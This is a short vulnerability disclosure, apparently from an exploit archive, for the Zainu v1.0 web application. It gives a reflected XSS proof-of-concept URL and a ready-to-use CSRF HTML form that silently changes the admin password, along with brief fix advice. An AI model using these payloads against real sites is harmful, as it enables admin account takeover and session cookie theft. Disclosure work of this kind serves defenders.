< ------------------- header data start ------------------- >

#############################################################

# Application Name : Zainu v1.0

# vulnerable Type : XSRF - XSS

# Infection : Admin sifresi degistirilebilir ..! cookieler çalinabilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir ! - zararli karakterler filtrelenmelidir.

# Demo : http://www.zainu.com/demo/

# author : CWCaspeR ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

[XSS]
/index.php?searchSongKeyword=><script>alert(’CaspeR’)</script>

[XSRF]
<form action=http://hedefsite.com/process.php method=post>
<input type=hidden name=action value=Admin/password>
<input class=input type=hidden name=password value=NEWpassWORD>
<input class=input type=hidden name=retype_password value=NEWpassWORD>
<input class=but type=submit value=BUTONADI>
</form>

< -- bug code end of -- >